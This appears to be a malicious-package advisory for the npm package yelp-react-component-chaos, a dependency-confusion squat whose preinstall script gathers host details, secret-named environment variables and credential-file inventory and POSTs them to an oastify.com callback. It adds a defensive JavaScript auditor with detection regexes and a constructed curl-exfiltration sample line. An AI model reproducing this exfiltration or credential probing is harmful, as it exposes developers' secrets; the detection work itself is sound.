MAL-2026-5515
Malicious code in yelp-react-component-chaos (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (711cd262cc670c0e66cf2878b6fa22db21a2e420313a58aa029cbc619f2b27cc)

On `npm install`, preinstall.js collects the hostname, username, cwd, network interfaces, and the names of environment variables matching /TOKEN|SECRET|PASSWORD|KEY|AUTH|NPM|AWS|GITHUB|YELP|DATABASE/i, then probes for the existence and sizes of ~/.npmrc, ~/.gitconfig, ~/.ssh/id_rsa, ~/.ssh/id_ed25519, ~/.aws/credentials, ~/.env, ~/.netrc, and ~/.docker/config.json. The collected payload is POSTed via curl to http://3w0e8s6jg6tkyv03vdesvscvlmrdf43t.oastify.com (a Burp Collaborator OAST domain) over plain HTTP. The payload self-identifies with `attack: 'dependency-confusion-yelp'`, and the package name `yelp-react-component-chaos` impersonates Yelp's internal React tooling namespace, indicating a dependency-confusion squat against Yelp's private registry. Any developer or CI pipeline that resolves this name from public npm has its host fingerprinted and its credential-file inventory reported off-host, enabling targeted follow-on theft.
## Source: ossf-package-analysis (888a90bd95ca140a3cc5946c0f1a7bf5b52f04ac2f7732722de7db72ec409801)

The OpenSSF Package Analysis project identified 'yelp-react-component-chaos' @ 8.14.5 (npm) as malicious.

It is considered malicious because:
- The package communicates with a domain associated with malicious activity.
- The package executes one or more commands associated with malicious behavior.
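The install-time behaviour described in the amazon-inspector entry above (a `preinstall` hook that fingerprints the host, probes credential files and calls back to an OAST domain over plain HTTP) can be screened for before a tarball is ever installed. The following is an added example, not code from the advisory or from the package: it audits a parsed package.json plus the tarball's files for lifecycle hooks exhibiting those indicators. The OAST domain list, the sample manifest and the sample script fragments are constructed for illustration; the callback host in the sample is a placeholder, not the real indicator.

```javascript
// Added example (not from the advisory): audit an npm package's install-time
// lifecycle hooks for the exfiltration pattern the advisory describes.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// [label, regex] pairs matching the behaviours called out above: a network
// client, an OAST callback domain, plaintext HTTP, host fingerprinting,
// environment scraping and credential-file probing.
const INDICATORS = [
  ["spawns curl/wget", /\b(curl|wget)\b/],
  ["contacts an OAST callback domain", /\b(oastify\.com|burpcollaborator\.net|interact\.sh)\b/i],
  ["sends data over plaintext HTTP", /\bhttp:\/\//i],
  ["fingerprints the host", /\bos\.(hostname|userInfo|networkInterfaces)\s*\(/],
  ["scrapes environment variables", /\bprocess\.env\b/],
  ["probes credential files", /\.(npmrc|netrc|gitconfig)\b|\.ssh\/id_|\.aws\/credentials|\.docker\/config\.json/],
];

// manifest: parsed package.json; files: { relativePath: fileContents } taken from
// the unpacked tarball. Returns one finding per (hook, indicator) hit; [] is clean.
function auditLifecycleHooks(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // The hook command itself is rarely the payload; follow `node <file>.js`
    // references into the tarball and scan command and script bodies together.
    const refs = [...cmd.matchAll(/\bnode\s+(?:\.\/)?(\S+\.js)/g)].map((m) => m[1]);
    const text = [cmd, ...refs.map((f) => files[f] || "")].join("\n");
    for (const [label, re] of INDICATORS) {
      if (re.test(text)) findings.push(`${hook}: ${label}`);
    }
  }
  return findings;
}

// Constructed sample mirroring the advisory's description (fragments only, not a
// working script; the callback host is a placeholder).
const SAMPLE_MANIFEST = { name: "yelp-react-component-chaos", scripts: { preinstall: "node preinstall.js" } };
const SAMPLE_FILES = {
  "preinstall.js": [
    "const host = os.hostname(), user = os.userInfo().username;",
    "const keys = Object.keys(process.env).filter(k => /TOKEN|SECRET|PASSWORD/i.test(k));",
    "for (const p of ['.npmrc', '.ssh/id_rsa', '.aws/credentials']) fs.existsSync(p);",
    "execSync('curl -s -X POST http://<constructed-id>.oastify.com -d ' + body);",
  ].join("\n"),
};
// Constructed clean manifest: build/test scripts do not run on `npm install`.
const CLEAN_MANIFEST = { name: "harmless-lib", scripts: { build: "tsc -p .", test: "node test.js" } };
```

Running the audit in CI before `npm install` (or installing with `npm install --ignore-scripts` and reviewing any flagged hooks) turns the advisory's indicators into a gate rather than a post-incident finding.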
Affected packages
No fixed version published yet for yelp-react-component-chaos (npm). Pin to a known-safe version or switch to an alternative.